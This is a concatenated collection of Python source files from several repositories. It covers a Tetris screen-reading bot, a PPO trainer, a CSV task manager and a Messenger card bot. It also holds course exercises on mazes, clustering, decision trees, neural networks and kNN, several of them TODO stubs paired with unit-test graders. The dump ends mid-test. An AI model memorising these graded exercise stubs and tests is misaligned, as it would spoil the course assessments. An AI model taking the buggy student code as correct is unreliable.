self.templates = {k: cv2.imread(v, 0) for (k, v) in self.static_templates.items()}
self.current_templates = ['I', 'J', 'L', 'O', 'S', 'T', 'Z']
self.next_templates = ['nextI', 'nextJ', 'nextL', 'nextO', 'nextS', 'nextT', 'nextZ']
self.show_window = show_window
self.top = 280
self.right = 0
self.width = 1400
self.height = 1050
self.stats_top = 350
self.stats_right = 300
self.stats_width = 645
self.stats_height = 900
self.last_stats = None
self.frame = None
def __take_screenshot(self, top, left, width, height):
img = np.array(ImageGrab.grab(bbox=(top, left, width, height)))
return cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
def get_image(self, path):
return cv2.imread(path, 0)
def refresh_frame(self):
self.frame = self.__take_screenshot(self.top, self.right, self.width, self.height)
def display_frame(self):
cv2.imshow('window', self.frame)
if cv2.waitKey(25) & 0xFF == ord('q'):
cv2.destroyAllWindows()
def match_template(self, img_grayscale, template, threshold=0.9):
result = cv2.matchTemplate(img_grayscale, template, cv2.TM_CCOEFF_NORMED)
matches = np.where(result >= threshold)
return matches
def find_template(self, name, image=None, threshold=0.9):
if image is None:
if self.frame is None:
self.refresh_frame()
image = self.frame
return self.match_template(
image,
self.templates[name],
threshold
)
def scaled_find_template(self, name, image=None, threshold=0.9, scales=[1.0, 0.9, 1.1]):
if image is None:
if self.frame is None:
self.refresh_frame()
image = self.frame
initial_template = self.templates[name]
for scale in scales:
scaled_template = cv2.resize(initial_template, (0,0), fx=scale, fy=scale)
matches = self.match_template(
image,
scaled_template,
threshold
)
if np.shape(matches)[1] >= 1:
return matches
return matches
def can_see_object(self, template, threshold=0.9):
matches = self.find_template(template, threshold=threshold)
return np.shape(matches)[1] >= 1
def update(self):
self.refresh_frame()
if self.show_window:
self.display_frame()
## Game specific functions
def current_piece(self):
for template in self.current_templates:
if self.can_see_object(template):
return template
return None
def next_piece(self):
for template in self.next_templates:
if self.can_see_object(template):
return (template[-1])
return None
def is_block_down(self):
stats = self.__take_screenshot(self.stats_top,
self.stats_right,
self.stats_width,
self.stats_height)
return not np.array_equal(stats, self.last_stats)
def update_stats(self):
self.last_stats = self.__take_screenshot(self.stats_top,
self.stats_right,
self.stats_width,
self.stats_height)
## On Event functions
def on_start(self):
return self.can_see_object("start")
def on_choose_game_type(self):
return self.can_see_object("game_type")
def on_choose_level(self):
return self.can_see_object("level")
def on_playing(self):
return self.can_see_object("playing")
def on_game_over(self):
return self.can_see_object("end")
```
|
{
"source": "jet-black/ppo-lstm-parallel",
"score": 3
}
|
#### File: jet-black/ppo-lstm-parallel/environments.py
```python
def parse_properties(file_name):
lines = open(file_name).readlines()
result = {}
for l in lines:
a, b = l.split("=")
b = b.strip()
if b == "True":
result[a] = True
elif b == "False":
result[a] = False
elif "." in b:
result[a] = float(b)
elif b.isdigit():
result[a] = int(b)
else:
result[a] = b
return result
def get_env_options(env_name, use_gpu):
import gym
env = gym.make(env_name)
max_episode_steps = env.spec.max_episode_steps
if max_episode_steps is None:
max_episode_steps = 1e+8
state_dim = env.observation_space.shape[0]
discrete = False
action_dim = None
scales_lo = None
scales_hi = None
if isinstance(env.action_space, gym.spaces.Discrete):
action_dim = env.action_space.n
discrete = True
elif isinstance(env.action_space, gym.spaces.Box):
action_dim = env.action_space.shape[0]
scales_lo = env.action_space.low
scales_hi = env.action_space.high
basic_opts = {
"action_dim": action_dim,
"env_name": env_name,
"state_dim": state_dim,
"discrete": discrete,
"scales_lo": scales_lo,
"scales_hi": scales_hi,
"max_episode_steps": max_episode_steps,
"use_gpu": use_gpu,
}
file_props = get_config(env_name)
for k, v in file_props.items():
basic_opts[k] = v
result = basic_opts
for k, v in result.items():
print("%s : %s" % (k, v))
return result
def get_config(env_name):
try:
file_props = parse_properties("props/%s.properties" % env_name)
except:
print("Failed to load custom properties for env. Using default")
file_props = {}
default_props = parse_properties("props/default.properties")
result = {}
for k, v in default_props.items():
result[k] = v
for k, v in file_props.items():
result[k] = v
mem_fraction = 0.98 / (result["worker_num"] + 2)
result["mem_fraction"] = mem_fraction
return result
class EnvironmentProducer:
def __init__(self, env_name, use_gpu):
self.env_name = env_name
self.use_gpu = use_gpu
def get_new_environment(self):
import gym
env = gym.make(self.env_name)
return env
def get_env_name(self):
return self.env_name
def get_use_gpu(self):
return self.use_gpu
```
#### File: jet-black/ppo-lstm-parallel/play.py
```python
import tensorflow as tf
import argparse
import tensorflow as tf
import environments
from agent import PPOAgent
from policy import *
def print_summary(ep_count, rew):
print("Episode: %s. Reward: %s" % (ep_count, rew))
def start(env):
MASTER_NAME = "master-0"
tf.reset_default_graph()
with tf.Session() as session:
with tf.variable_scope(MASTER_NAME) as scope:
env_opts = environments.get_env_options(env, False)
policy = get_policy(env_opts, session)
master_agent = PPOAgent(policy, session, MASTER_NAME, env_opts)
saver = tf.train.Saver(max_to_keep=1)
saver = tf.train.import_meta_graph(tf.train.latest_checkpoint("models/%s/" % env) + ".meta")
saver.restore(session, tf.train.latest_checkpoint("models/%s/" % env))
try:
pass
except:
print("Failed to restore model, starting from scratch")
session.run(tf.global_variables_initializer())
producer = environments.EnvironmentProducer(env, False)
env = producer.get_new_environment()
episode_count = 0
cum_rew = 0
while True:
terminal = False
s0 = env.reset()
cur_hidden_state = master_agent.get_init_hidden_state()
episode_count += 1
cur_rew = 0
while not terminal:
env.render()
action, h_out = master_agent.get_strict_sample(s0, cur_hidden_state)
cur_hidden_state = h_out
s0, r, terminal, _ = env.step(action)
cum_rew += r
cur_rew += r
print("Ep: %s, cur_reward: %s reward: %s" % (episode_count, cur_rew, cum_rew / episode_count))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=('Parallel PPO'))
parser.add_argument('-env', type=str, help='Env name')
args = parser.parse_args()
start(**vars(args))
```
#### File: jet-black/ppo-lstm-parallel/reward.py
```python
class ScalingRewardTransformer:
def __init__(self, env_opts):
self.env_opts = env_opts
def transform_reward(self, r):
return r / 100.0
class PositiveRewardTransformer:
def __init__(self, env_opts):
self.env_opts = env_opts
def transform_reward(self, r):
return max(-0.001, r / 100.0)
class IdentityRewardTransformer:
def __init__(self, env_opts):
self.env_opts = env_opts
def transform_reward(self, r):
return r
def get_reward_transformer(env_ops):
name = env_ops["reward_transform"]
if name == "scale":
return ScalingRewardTransformer(env_ops)
elif name == "positive":
return PositiveRewardTransformer(env_ops)
else:
return IdentityRewardTransformer(env_ops)
```
#### File: jet-black/ppo-lstm-parallel/train_parallel.py
```python
import argparse
import os
import shutil
import threading
import time
from master import SimpleMaster
import environments
def start(env, gpu):
env_name = env
if not os.path.exists('logs'):
os.mkdir('logs')
if not os.path.exists('models'):
os.mkdir('models')
try:
shutil.rmtree("logs/" + env_name)
except:
pass
env_producer = environments.EnvironmentProducer(env_name, gpu)
master = SimpleMaster(env_producer)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=('Parallel PPO'))
parser.add_argument('-env', type=str, help='Env name')
parser.add_argument('-gpu', action='store_true')
args = parser.parse_args()
start(**vars(args))
```
|
{
"source": "jetboom1/workshop1",
"score": 3
}
|
#### File: jetboom1/workshop1/final_project.py
```python
from idlelib.multicall import r
def read_csv(path_file):
"""
:param path_file: path to csv file
:return: list of lists, consists of 5 elements:
0 - name of task
1 - plasce
2 - teammates
3 - deadline
4 - priority
>>> 1 == 1
True
"""
all_list = []
with open(path_file, 'r', encoding='utf-8') as csv_file:
for line in csv_file:
line = line.strip()
line = line.split(',')
all_list.append(line)
return all_list
def print_csv(all_list):
"""
:param all_list: list of all tasks
:return: nothing
prints all tasks
>>> print_csv([["поїсти", "БФК", "сам", "17.12.2021", "5"]])
['поїсти', 'БФК', 'сам', '17.12.2021', '5']
<BLANKLINE>
>>> 110 * 2 == 221
False
"""
all_list = sorted(all_list, key=lambda x: x[4])
for i in range(len(all_list)):
print(all_list[i])
print()
def delete_notion(filepath, name_task):
"""
Delete task from csv file
:param filepath:
:param name_task:
:return:
>>> 10==1123
False
"""
with open(filepath, mode='r', encoding='utf-8') as file:
data = file.readlines()
for i in range(len(data)):
data[i] = data[i].strip("\n")
data[i] = data[i].split(',')
for i in data:
if name_task in i:
data.pop(data.index(i))
with open(filepath, mode='w', encoding='utf-8') as file:
for item in data:
file.write(",".join(item))
file.write('\n')
def tasks_today(list_of_tasks):
"""
list[list[str]] --> list[list[str]]
Return tasks for today.
>>> tasks_today([['task', 's', 's', '18.12.2001', '1'], ['task2', 's', 's', '18.12.2001', '2']])
No task for today, Relax :)
<BLANKLINE>
"""
from datetime import date
today = str(date.today().strftime('%d.%m.%Y'))
# today = today.replace("/", ".")
today_tasks = []
for i in range(len(list_of_tasks)):
if today in list_of_tasks[i]:
today_tasks.append(list_of_tasks[i])
if len(today_tasks) == 0:
print('No task for today, Relax :)')
else:
print(today_tasks)
print()
def write_csv(path_file, new_task):
"""
:param new_task: what to write in csv file
:param path_file: path to csv file
:return: nothing
writes a new line (task) to csv file
>>> write_csv('my_csv.csv', 'task, s, s, 18.12.2001, 1')
"""
with open(path_file, 'a', encoding='utf-8') as csv_file:
csv_file.write('\n' + new_task)
def add_tasks():
"""Asks information about task and returns it in csv format
>>> print('Doctest will not work here')
Doctest will not work here
"""
task = input('Write a task: ')
location = input('Write a location: ')
collaborators = input('Write your coworkers: ')
date = input('Write the date by which the task must be completed in format dd.mm.yyyy: ')
priority = input('Write a priority from 1 to the number of the last task: ')
lst = [task,location,collaborators,date,priority]
return ','.join(lst)
if __name__ == '__main__':
doctest.testmod(raise_on_error=True)
print('enter your path to csv file with tasks')
path = input()
while True:
print('Enter 1 if you want to add task')
print('Enter 2 if you want to delete task')
print('Enter 3 if you want to see today task')
print('Enter 4 to see all task, sorted by priority')
print('Enter exit if you want to exit')
action = input()
if action == '1':
print("What task do you want to add ?")
task = add_tasks()
write_csv(path, task)
elif action == '2':
print("What task do you want to delete ?")
task = input()
delete_notion(path, task)
elif action == '3':
print("Do you want to see today tasks ?")
tasks_today(read_csv(path))
elif action == '4':
print_csv(read_csv(path))
elif action == "exit":
print('thanks for using, bye')
break
else:
print('wrong input, repeat one more time')
```
|
{
"source": "jetbooster/mtg_messenger_bot",
"score": 2
}
|
#### File: jetbooster/mtg_messenger_bot/main.py
```python
import re
import os
from fbchat import Client
from fbchat.models import Message
import utils
import services
# Subclass fbchat.Client and override required methods
class MtgBot(Client):
def __init__(self, username, password):
super().__init__(username,password)
self.LukesCards = utils.LukesCards()
self.MainRegex = re.compile(r"(?<=\[\[)(.*?)(?=\]\])")
def _uploadImage(self, image_path, data, mimetype):
# mimetype seems a but flakey, force it to be image/jpeg
return super()._uploadImage(image_path, data, "image/jpeg")
def onMessage(self, author_id, message_object, thread_id, thread_type, **kwargs):
matchList = self.MainRegex.findall(message_object.text)
# Have I been called? if not, do nothing.
if 'mtgbot:' in message_object.text:
return
if len(matchList) != 0:
for name in matchList:
if name.lower() == 'luke':
alteredName = self.LukesCards.getNextCard()
else:
alteredName = utils.nicknames(name)
if alteredName != name:
# A nickname has been found, jump straight to scryfall
cardData = services.scryfall(alteredName)
else:
cardData = services.cardFetch(alteredName)
if cardData:
# if cardData exists, the best match was found! fire away!
# obviously, no gurantee it will be the card you wanted!
if cardData['dualfaced']:
#check in file cache
filename = services.buildDualFaced(cardData)
self.sendLocalImage('./cache/{}'.format(filename), message=Message(
text='mtgbot: {}'.format(cardData['name'])), thread_id=thread_id, thread_type=thread_type)
else:
print('sending remote image')
self.sendRemoteImage(cardData['imageurls'][0], message=Message(
text='mtgbot: {}'.format(cardData['name'])), thread_id=thread_id, thread_type=thread_type)
else:
self.send(message=Message(text='mtgbot: No card found for {}'.format(
name)), thread_id=thread_id, thread_type=thread_type)
if __name__ == "__main__":
YOUR_FACEBOOK_USERNAME = ""
YOUR_FACEBOOK_PASSWORD = ""
with open('credentials.txt') as fyl:
YOUR_FACEBOOK_USERNAME = fyl.readline().strip()
YOUR_FACEBOOK_PASSWORD = fyl.readline().strip()
if not 'cache' in os.listdir('.'):
os.mkdir('./cache')
client = MtgBot(YOUR_FACEBOOK_USERNAME, YOUR_FACEBOOK_PASSWORD)
client.listen()
```
|
{
"source": "jetbrains-academy/AMazing",
"score": 3
}
|
#### File: Building the Maze/Add Walls to the Cell/cell.py
```python
class Cell:
def __init__(self, x, y):
self.x, self.y = x, y
self.walls = {'N': True, 'S': True, 'E': True, 'W': True}
```
#### File: Create a Cell/tests/test_task.py
```python
import unittest
class TestCase(unittest.TestCase):
def test_import(self):
try:
from cell import Cell
except ImportError:
self.fail("Create a class named 'Cell'")
def test_cell_x_y_exist(self):
from cell import Cell
cell = Cell(1, 5)
self.assertTrue(hasattr(cell, "x"), "Cell should store x position in the x field")
self.assertTrue(hasattr(cell, "y"), "Cell should store y position in the y field")
def test_cell_x_y(self):
from cell import Cell
cell = Cell(1, 5)
self.assertEqual(1, cell.x, "Assign x to the cell.x")
self.assertEqual(5, cell.y, "Assign y to the cell.y")
```
#### File: Building the Maze/Make the Maze/maze.py
```python
import random
import numpy as np
from cell import Cell
class Maze:
delta = {'N': (0, -1),
'S': (0, 1),
'W': (-1, 0),
'E': (1, 0)}
def __init__(self, nx, ny):
self.nx, self.ny = nx, ny
self.maze_grid = np.array([[Cell(x, y) for y in range(ny)] for x in range(nx)])
def cell_at(self, x, y):
return self.maze_grid[x][y]
def find_valid_neighbors(self, cell):
neighbors = []
for direction, (dx, dy) in self.delta.items():
neighbor_x, neighbor_y = cell.x + dx, cell.y + dy
if (0 <= neighbor_x < self.nx) and (0 <= neighbor_y < self.ny):
neighbor = self.cell_at(neighbor_x, neighbor_y)
if neighbor.has_all_walls():
neighbors.append((direction, neighbor))
return neighbors
def make_maze(self):
n = self.nx * self.ny
cell_stack = []
current_cell = self.cell_at(0, 0)
current_cell.status = 'Start'
n_visited = 1
while n_visited < n:
neighbors = self.find_valid_neighbors(current_cell)
if not neighbors:
current_cell = cell_stack.pop()
continue
direction, next_cell = random.choice(neighbors)
current_cell.knock_down_wall(next_cell, direction)
cell_stack.append(current_cell)
current_cell = next_cell
n_visited += 1
if n_visited == n:
current_cell.status = 'End'
```
#### File: Building the Maze/Maze/maze.py
```python
from cell import Cell
import numpy as np
class Maze:
def __init__(self, nx, ny):
self.nx, self.ny = nx, ny
self.maze_grid = np.array([[Cell(x, y) for y in range(ny)] for x in range(nx)])
```
|
{
"source": "jetbrains-academy/introduction_to_python",
"score": 3
}
|
#### File: Data structures/Tuples/tests.py
```python
from test_helper import run_common_tests, passed, failed, get_answer_placeholders
def test_window():
window = get_answer_placeholders()[0]
if "len(" in window:
passed()
else:
failed("Use len() function")
def test_window1():
window = get_answer_placeholders()[1]
if "fun_tuple" in window:
passed()
else:
failed("Add a string 'fun_tuple' to your tuple")
def test_window2():
window = get_answer_placeholders()[1]
if "," in window:
passed()
else:
failed("A trailing comma is required")
if __name__ == '__main__':
run_common_tests("Use len() function")
test_window()
test_window1()
test_window2()
```
#### File: Functions/Default parameters/tests.py
```python
parameters/tests.py
from test_helper import run_common_tests, failed, passed, get_answer_placeholders
def test_window_names():
window = get_answer_placeholders()[0]
if "subject" in window and "name=" in window:
passed()
else:
failed("Add a default value to the parameter")
if __name__ == '__main__':
run_common_tests()
test_window_names()
```
#### File: Functions/Keyword Arguments/tests.py
```python
from test_helper import run_common_tests, failed, passed, get_answer_placeholders
def test_window():
window = get_answer_placeholders()[0]
if "soup" in window and "growl" in window and "Sphinx" in window:
passed()
else:
failed("Input values seem to be off")
def test_window1():
window = get_answer_placeholders()[0]
if "action=" in window and "breed=" in window:
passed()
else:
failed("You keyword argument syntax has room for improvement!")
if __name__ == '__main__':
run_common_tests()
test_window()
test_window1()
```
|
{
"source": "jetbrains-academy/Machine-Learning-101",
"score": 4
}
|
#### File: Bayes Guards SMS/Vectorize/vectorize.py
```python
import numpy as np
import string
# This function creates an array of lines, where lines are transformed into lists of words
# without spaces and punctuation symbols. `np.char.lower()` returns an array with the elements
# converted to lowercase; `translate()` returns a copy of the string where characters have
# been mapped through the given translation table; `str.maketrans()` provides a translation table
# for `translate()`, in our case it specifies that punctuation symbols should be replaced with
# None. `np.char.split()` returns a list of the words for each element in the array.
def split_by_words(X):
return np.char.split(np.char.translate(np.char.lower(X), str.maketrans('', '', string.punctuation)))
def vectorize(X):
# get the number of input messages
X_len = len(X)
# get a vector of words out of each message
X_split = # TODO
# get a 1D array of unique words
uniques = # TODO
# create an index dictionary and fill it with unique words and their indices
index_dict = {}
for index, word in enumerate(uniques):
# TODO
# create an array of zeros with dimensions corresponding
# to input data size and index_dict length
vectorization = # TODO
# each i'th line of the array contains in the j'th position a number x
# which shows how many times the i'th word was encountered in the j'th message
for index, message in enumerate(X_split):
unique, count = # TODO
for i, word in enumerate(unique):
# TODO
return index_dict, vectorization
```
#### File: Comic-Con and k-means/Conclusion/task.py
```python
from PIL import Image
from PIL import ImageDraw
import numpy as np
from processing import recolor
IMAGE_WIDTH = 768
IMAGE_HEIGHT = 1024
def read_image(path='superman-batman.png'):
image = Image.open(path)
return np.array(image).reshape(-1, 3)
if __name__ == '__main__':
image = read_image()
recolored_image = recolor(image, 8).reshape(IMAGE_HEIGHT, IMAGE_WIDTH, 3).astype('uint8')
image = Image.fromarray(recolored_image)
image.save("recolored-superman-batman.png")
```
#### File: Comic-Con and k-means/Histogram/task.py
```python
from PIL import Image
import numpy as np
from plotting import plot_colors, centroid_histogram
from clustering import k_means
from distances import euclidean_distance
def read_image(path='superman-batman.png'):
image = Image.open(path)
return np.array(image).reshape(-1, 3)
if __name__ == '__main__':
image = read_image()
(pixel_labels, centroids) = k_means(image, 4, euclidean_distance)
print(pixel_labels)
hist = centroid_histogram(pixel_labels)
plot_colors(hist, centroids)
```
#### File: Image recoloring/tests/test_task.py
```python
import unittest
import numpy as np
from processing import recolor
class TestCase(unittest.TestCase):
def test_colors_num(self):
image = np.array([[255, 255, 255], [0, 0, 0], [0, 2, 0], [255, 255, 254]])
for i in range(11):
if i == 10:
self.fail()
try:
recolored_image = recolor(image, 2)
expected_image = np.array([[255, 255, 254], [0, 1, 0], [0, 1, 0], [255, 255, 254]])
self.assertEqual(2, len(np.unique(recolored_image, axis=0)))
np.testing.assert_array_equal(recolored_image, expected_image)
break
except IndexError:
continue
def test_colors_num_2(self):
image = np.array([[255, 255, 255], [0, 0, 0], [0, 2, 0], [255, 255, 254]])
recolored_image = recolor(image, 3)
self.assertEqual(3, len(np.unique(recolored_image, axis=0)))
```
#### File: Comic-Con and k-means/K-means/task.py
```python
from PIL import Image
import numpy as np
from distances import euclidean_distance
from clustering import k_means
def read_image(path='superman-batman.png'):
image = Image.open(path)
return np.array(image).reshape(-1, 3)
if __name__ == '__main__':
image = read_image()
(centroids, labels) = k_means(image, 4, euclidean_distance)
print("Cluster centers:")
for label in labels:
print(label)
```
#### File: Reading an image/tests/test_task.py
```python
import numpy as np
import unittest
from numpy.ma.testutils import assert_array_equal
from task import read_image
# The test is checking read_image looking somewhat like this
# def read_image(path='superman-batman.png'):
# image = Image.open(path)
# return np.array(image).reshape(-1, 3)
class TestCase(unittest.TestCase):
# TODO: this test not passing in the student mode is a bug
# def test_read_image(self):
# image = read_image("./tests/star.png")
# expected_star = np.loadtxt("./tests/star.txt")
# assert_array_equal(expected_star, image)
def test_shape(self):
image = read_image("./superman-batman.png")
self.assertEqual((786432, 3), image.shape)
```
#### File: Horror Trees/Conclusion/divide.py
```python
from calculate_entropy import entropy
class Predicate:
def __init__(self, column, value):
self.column = column
self.value = value
def divide(self, X, y):
if isinstance(self.value, int) or isinstance(self.value, float):
mask = X[:, self.column] >= self.value
else:
mask = X[:, self.column] == self.value
return X[mask], y[mask], X[~mask], y[~mask]
def information_gain(self, X, y):
X1, y1, X2, y2 = self.divide(X, y)
p = float(len(X1)) / len(X)
gain = entropy(y) - p * entropy(y1) - (1 - p) * entropy(y2)
return gain
```
#### File: Horror Trees/Entropy/calculate_entropy.py
```python
import numpy as np
def entropy(y):
_, counts = np.unique(y, return_counts=True)
p = counts / len(y)
return -(p * np.log2(p)).sum()
```
#### File: Horror Trees/Node/calculate_entropy.py
```python
import numpy as np
def entropy(y):
# use numpy.unique to obtain sorted unique elements and their counts
_, counts = # TODO
# calculate the proportion of each class in the whole dataset
# the return value should be an array of proportions
p = # TODO
# calculate and return entropy using the formula from the task
# logarithm can be calculated using the numpy.log2 function
return # TODO
```
#### File: Horror Trees/Node/divide.py
```python
Trees/Node/divide.py
from calculate_entropy import entropy
# Here we defined the Predicate class to store predicates – values in
# particular columns that are used to split our dataset. The class
# includes the divide method, which splits the dataset by the given predicate,
# and the information_gain method, which calculates the information gain for a given split.
class Predicate:
def __init__(self, column, value):
self.column = column
self.value = value
def divide(self, X, y):
# Check if the value is numeric and create a boolean filter array
# based on the "greater than or equal to" condition.
if # TODO :
mask = # TODO
# If the value is not numeric (int or float), create the array based on the
# "equal to" condition.
else:
mask = # TODO
# Return the results in the following order: X1, y1, X2, y2.
return # TODO
# This method is to be implemented in the task "Information Gain".
def information_gain(self, X, y):
pass
# Use the divide method to split the sample.
# X1, y1, X2, y2 = # TODO
# Calculate the fraction of X1 in the whole dataset.
# p = # TODO
# Use the entropy function you wrote earlier and the formula
# from the task to calculate the information gain.
# gain = # TODO
# return gain
```
#### File: Accuracy/tests/test_task.py
```python
import unittest
from task import *
from evaluate import accuracy
from network import NN
class TestCase(unittest.TestCase):
def test_none(self):
X, y = read_data('iris.csv')
X_train, y_train, X_test, y_test = train_test_split(X, y, 0.7)
nn = NN(len(X[0]), 5, 1)
self.assertIsNotNone(accuracy(nn, X_test, y_test), msg="your function returns nothing")
def test_type(self):
X, y = read_data('iris.csv')
X_train, y_train, X_test, y_test = train_test_split(X, y, 0.7)
nn = NN(len(X[0]), 5, 1)
self.assertIsInstance(accuracy(nn, X_test, y_test), float, msg="your function returns a wrong type")
def test_interval(self):
X, y = read_data('iris.csv')
X_train, y_train, X_test, y_test = train_test_split(X, y, 0.7)
nn = NN(len(X[0]), 5, 1)
self.assertTrue(0 <= accuracy(nn, X_test, y_test) <= 1, msg="accuracy should be within the [0, 1] interval")
```
#### File: Iris Network/Conclusion/task.py
```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from network import NN
from evaluate import accuracy
def read_data(fpath):
iris = pd.read_csv(fpath)
iris.loc[iris['species'] == 'virginica', 'species'] = 0
iris.loc[iris['species'] == 'versicolor', 'species'] = 1
iris.loc[iris['species'] == 'setosa', 'species'] = 2
iris = iris[iris['species'] != 2]
return iris[['petal_length', 'petal_width']].values, iris[['species']].values.astype('uint8')
def plot_data(X, y):
plt.scatter(X[:, 0], X[:, 1], c=y[:, 0], s=40, cmap=plt.cm.Spectral)
plt.title("IRIS DATA | Blue - Versicolor, Red - Virginica ")
plt.xlabel('Petal Length')
plt.ylabel('Petal Width')
plt.show()
def train_test_split(X, y, ratio=0.8):
indices = np.arange(X.shape[0])
np.random.shuffle(indices)
train_len = int(X.shape[0] * ratio)
return X[indices[:train_len]], y[indices[:train_len]], X[indices[train_len:]], y[indices[train_len:]]
if __name__ == '__main__':
X, y = read_data('iris.csv')
# comment the following line if you don't need the plot anymore
plot_data(X, y)
X_train, y_train, X_test, y_test = train_test_split(X, y, 0.7)
nn = NN(len(X[0]), 5, 1)
output = nn.feedforward(X_train)
print(output)
print(f'w1 before backward propagation: \n{nn.w1} \nw2 before backward propagation:\n{nn.w2}')
nn.backward(X_train, y_train, output)
print(f'w1 after backward propagation: \n{nn.w1} \nw2 after backward propagation:\n{nn.w2}')
nn.train(X_train, y_train)
print("Accuracy:")
print(accuracy(nn, X_test, y_test))
```
#### File: Iris Network/Neurons/activation.py
```python
import numpy as np
def sigmoid(x):
# implement the logistic sigmoid function based on the formula in the task description
# you may need the numpy.exp function
return # TODO
```
#### File: Iris Network/Train and Predict/network.py
```python
import numpy as np
from activation import sigmoid
from derivative import sigmoid_derivative
class NN:
def __init__(self, input_size, hidden_size, output_size):
self.w1 = 2 * np.random.random((input_size, hidden_size)) - 1
self.w2 = 2 * np.random.random((hidden_size, output_size)) - 1
def feedforward(self, X):
self.layer1 = sigmoid(np.dot(X, self.w1))
return sigmoid(np.dot(self.layer1, self.w2))
def backward(self, X, y, output, learning_rate=0.01):
l2_delta = (y - output) * sigmoid_derivative(output)
l1_delta = np.dot(l2_delta, self.w2.T) * sigmoid_derivative(self.layer1)
self.w2 += (np.dot(self.layer1.T, l2_delta) * learning_rate)
self.w1 += (np.dot(X.T, l1_delta) * learning_rate)
def train(self, X, y, n_iter=20000):
for itr in range(n_iter):
l2 = self.feedforward(X)
self.backward(X, y, l2)
def predict(self, X):
return self.feedforward(X)
```
#### File: Neighbors and wine/Conclusion/distances.py
```python
import numpy as np
def euclidean_dist(x, y):
return np.linalg.norm(x - y)
def taxicab_dist(x, y):
return np.abs(x - y).sum()
```
#### File: k-nearest neighbors/tests/test_task.py
```python
import numpy as np
import unittest
from numpy.ma.testutils import assert_array_equal
from metric_classification import knn
from distances import euclidean_dist
class TestCase(unittest.TestCase):
def test_length(self):
X_train = np.array([
[255, 255, 255],
[0, 0, 0],
[128, 128, 128],
[255, 0, 0],
[0, 255, 0],
[0, 0, 255]
])
y_train = np.array([0, 1, 2, 3, 4, 5])
X_test = np.array([
[0, 255, 0],
[255, 0, 0],
[0, 0, 255],
[255, 0, 255],
[100, 0, 50],
[100, 100, 100],
[50, 50, 50],
[200, 200, 200],
[10, 20, 30],
[100, 10, 200],
[32, 0, 255],
[128, 255, 64]
])
y_predicted = knn(X_train, y_train, X_test, 1, euclidean_dist)
self.assertEqual(len(y_predicted), 12, "You should assign label for each object in the X_train")
def test_knn_1_neighbor(self):
X_train = np.array([
[255, 255, 255],
[0, 0, 0],
[128, 128, 128],
[255, 0, 0],
[0, 255, 0],
[0, 0, 255]
])
y_train = np.array([0, 1, 2, 3, 4, 5])
X_test = np.array([
[0, 255, 0],
[255, 0, 0],
[0, 0, 255],
[255, 0, 255],
[100, 0, 50],
[100, 100, 100],
[50, 50, 50],
[200, 200, 200],
[10, 20, 30],
[100, 10, 200],
[32, 0, 255],
[128, 255, 64]
])
y_test = np.array([4, 3, 5, 2, 1, 2, 1, 0, 1, 5, 5, 2])
y_predicted = knn(X_train, y_train, X_test, 1, euclidean_dist)
assert_array_equal(y_predicted, y_test)
def test_knn_4_neighbor(self):
X_train = np.array([
[255, 255, 255],
[0, 0, 0],
[128, 128, 128],
[255, 0, 0],
[0, 255, 0],
[0, 0, 255]
])
y_train = np.array([0, 1, 2, 3, 4, 5])
X_test = np.array([
[0, 255, 0],
[255, 0, 0],
[0, 0, 255],
[255, 0, 255],
[100, 0, 50],
[100, 100, 100],
[50, 50, 50],
[200, 200, 200],
[10, 20, 30],
[100, 10, 200],
[32, 0, 255],
[128, 255, 64]
])
y_test = np.array([0, 0, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0])
y_predicted = knn(X_train, y_train, X_test, 4, euclidean_dist)
assert_array_equal(y_predicted, y_test)
```
#### File: Leave-one-out/tests/test_task.py
```python
import unittest
from distances import euclidean_dist
from crossvalidation import loocv
import numpy as np
class TestCase(unittest.TestCase):
def test_loo(self):
X_train = np.array([
[255, 255, 255],
[255, 255, 255],
[255, 255, 255],
[255, 255, 255],
[255, 255, 255],
[255, 255, 255],
[255, 255, 255],
[255, 255, 255],
[255, 255, 255],
[128, 128, 128],
[128, 128, 128],
[128, 128, 128],
])
y_train = np.array([0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1])
euclidean_opt = loocv(X_train, y_train, euclidean_dist)
self.assertEqual(3, euclidean_opt)
def test_loo_1_neighbor(self):
X_train = np.array([
[255, 255, 255],
[255, 255, 255],
[255, 255, 255],
[128, 128, 128],
[128, 128, 128],
[128, 128, 128],
])
y_train = np.array([1, 1, 1, 0, 0, 0])
euclidean_opt = loocv(X_train, y_train, euclidean_dist)
self.assertEqual(1, euclidean_opt)
```
#### File: Neighbors and wine/Sample division/metric_classification.py
```python
import numpy as np
def knn(X_train, y_train, X_test, k, dist):
# The function will return the class for x based on its neighbours from the X_train
# sample.
def classify_single(x):
# Here we create an array of distances from x to each of the X_train objects.
dists = #TODO
# This array will contain the indices of k nearest to the x objects. NumPy.argpartition
# might be useful here.
indices = #TODO
# The function returns the most frequent class among those in y_train represented
# by the indices.
return #TODO
return [classify_single(x) for x in X_test]
```
#### File: Pima indians diabetes and linear classifier/Gradient Descent/precision_recall.py
```python
import numpy as np
# The precision and recall metrics would be used to evaluate the quality of the prediction
def precision_recall(y_pred, y_test):
class_precision_recall = []
for c in np.unique(y_test):
tp = len([i for i in range(len(y_pred)) if y_pred[i] == c and y_test[i] == c])
fp = len([i for i in range(len(y_pred)) if y_pred[i] == c and y_test[i] != c])
fn = len([i for i in range(len(y_pred)) if y_pred[i] != y_test[i] and y_pred[i] != c])
precision = tp / (tp + fp) if tp + fp > 0 else 0.
recall = tp / (tp + fn) if tp + fn > 0 else 0.
class_precision_recall.append((c, precision, recall))
return class_precision_recall
# This method will allow you to visualize the precision and recall of the algorithm
def print_precision_recall(result):
for c, precision, recall in result:
print("class:", c, "\nprecision:", precision, "\nrecall:", recall, "\n")
```
#### File: Gradient Descent/tests/test_task.py
```python
import unittest
import numpy as np
from gradient_descent import GradientDescent
class TestCase(unittest.TestCase):
def test_weights(self):
gd = GradientDescent(alpha=0.1)
X = np.array([[1, 2, 3, 4, 5],
[1, 2, 3, 4, 5],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]])
y = np.array([1, 1, 2, 2])
gd.fit(X, y)
self.assertEquals(5, len(gd.weights))
def test_fit(self):
gd = GradientDescent(alpha=0.1)
X = np.array([[1, 2, 3, 4, 5], [1, 2, 3, 4, 5]])
y = np.array([1, 2])
result = gd.fit(X, y)
self.assertNotEqual(0, len(result))
def test_predict(self):
